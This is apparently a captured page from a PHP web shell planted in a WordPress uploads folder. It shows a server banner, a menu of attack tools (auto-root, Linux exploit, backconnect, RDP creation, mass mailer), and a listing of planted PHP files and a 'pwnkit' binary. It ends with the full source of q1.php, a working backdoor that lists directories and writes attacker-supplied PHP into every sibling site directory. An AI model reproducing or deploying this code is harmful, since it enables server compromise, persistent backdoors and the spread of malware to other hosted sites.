Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
thehappyfactory.eu /
wp-content /
uploads /
[ HOME SHELL ]
Name
Size
Permission
Action
2010
[ DIR ]
drwxr-xr-x
2011
[ DIR ]
drwxr-xr-x
2013
[ DIR ]
drwxr-xr-x
2014
[ DIR ]
drwxr-xr-x
2015
[ DIR ]
drwxr-xr-x
2016
[ DIR ]
drwxr-xr-x
2017
[ DIR ]
drwxr-xr-x
2018
[ DIR ]
drwxr-xr-x
2019
[ DIR ]
drwxr-xr-x
.htaccess
380
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
3.53
KB
-rw-r--r--
adminer.php
465.43
KB
-rw----r--
ahxdspij.php
760
B
-rw-r--r--
doiconvs.php
5.46
KB
-rw-r--r--
ex.php
3.53
KB
-rw-r--r--
inputs.php
3.53
KB
-rw-r--r--
mailer.php
161.68
KB
-rw-r--r--
nciii.php
13.63
KB
-rw-r--r--
orm.php
163.63
KB
-rw-r--r--
ot.php
115.61
KB
-rw-r--r--
pages.php
3.53
KB
-rw-r--r--
php8.php
70.78
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
q1.php
2.85
KB
-rw-r--r--
radio.php
3.53
KB
-rw-r--r--
tbvjsabh.php
760
B
-rw-r--r--
test.php
714
B
-rw-r--r--
unzip.php
22.15
KB
-rw-r--r--
witm.php
52.9
KB
-rw-r--r--
wp-blog-header.php
371
B
-r--r--r--
wp-login.php
3.53
KB
-rw-r--r--
xftv.php
143.87
KB
-r--r--r--
zwso.php
48.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : q1.php
<?php function generateRandomString($length) { $characters = 'abcdefghijklmnopqrstuvwxyz'; $charLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charLength - 1)]; } return $randomString; } function method1() { $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } function method2() { $currentPath = $_SERVER['DOCUMENT_ROOT']; if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } if (isset($_GET['met1'])) { method1(); } else if (isset($_GET['met2'])) { method2(); } else if (isset($_GET['actmet1'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else if (isset($_GET['actmet2'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = $_SERVER['DOCUMENT_ROOT']; $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else { echo 'DeathShop'; } ?>
Close